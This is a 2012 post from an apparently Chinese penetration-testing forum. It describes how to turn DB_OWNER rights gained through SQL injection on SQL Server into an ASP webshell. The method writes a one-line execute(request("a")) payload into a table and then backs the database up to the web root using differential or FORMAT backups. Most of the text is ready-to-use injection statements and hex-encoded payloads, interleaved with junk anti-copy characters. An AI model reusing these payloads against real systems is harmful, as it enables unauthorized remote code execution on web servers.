中国网络渗透测试联盟
标题:
DB_OWNER权限得到webshell的改进办法
[打印本页]
作者:
admin
时间:
2012-11-9 21:31
标题:
DB_OWNER权限得到webshell的改进办法
DB_OWNER权限得到webshell的两点改进:
3 x% X6 G5 u2 R% w
/ X k# T7 p2 O. {# c6 b8 L: r
减少备份文件大小,得到可执行的webshell成功率提高不少
/ B8 I8 q" S* s A/ N
一利用差异备份
. t, b5 Y2 u2 |6 [, ?. S% p
加一个参数WITH DIFFERENTIAL
$ c2 e1 |4 u- Z: n# V3 ~' ?$ Z
2 I9 \) p, G% s6 \8 J
1
0 k, H) v1 u: Q% ?
2
/ |0 U+ K( G) W. f
3
$ s% o- i3 e+ K
4
, f. G7 ]( k' h- u! H3 |7 u
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
) z' Z, e) C6 x' r. K0 G) W- L, k
create table [dbo].[xiaolu] ([cmd] [image]);
! K3 T! C1 N9 |. U, }
insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
! l9 A0 m$ s0 M2 N I
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH DIFFERENTIAL
; `) ^, v1 y& d5 W" U
' v( Q7 t+ N1 a& S! K$ @5 ]
二利用完全FORMAT
% C- y3 c S0 C* M
加一个参数WITH FROMAT
) F0 Y4 g0 Q. _ j9 i+ c
有些页面对数据库要执行几次,而备份又默认是每次都以追加的方式,如果一个注入点对数据库有几次操作,而备份的文件就 几倍的增加,所以
8 L B# Y8 m I/ [) l
) ]1 i7 H% N* u; [
1
, z# ~. M9 k7 n- Q
2
' x0 L% J) i5 c& t9 ]4 c) `
3
, \) p# F& q: d2 T
4
; K3 ]4 @1 r% L; r3 y E/ L
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
/ n, n* a# F; k% G5 _7 Y
create table [dbo].[xiaolu] ([cmd] [image]);
9 w8 }2 s6 `( ?$ ~& M% m& {# e
insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
0 B# s3 e; P. k
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH FORMAT
' G' W/ n7 B1 M" u
7 i$ ]! T4 `" F& k; a; M
总的来说就是那么简单几句,下面以备份数据库model为例子
: \3 S3 \# U! U
1
+ W5 H3 H! O6 C
8 r4 {9 {; M. Z7 ?% J% W* i: ]7 C
1
" ^6 f* b% W' Q/ n# D/ g3 Q
id=1;use model create table cmd(str image);insert into cmd(str) values ('<%25execute(request("a"))%25>')
# t$ G4 `, g9 s
0 e L' d0 l/ A5 L
2
' J# G3 l! o$ s6 V ^0 R; K
0 ]' I" z# T, t
1
. q5 o8 M; x L% T4 x2 u( H$ P
id=1;backup database model to disk='你的路径‘ with differential,format;--
/ b& H# u+ M; s
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2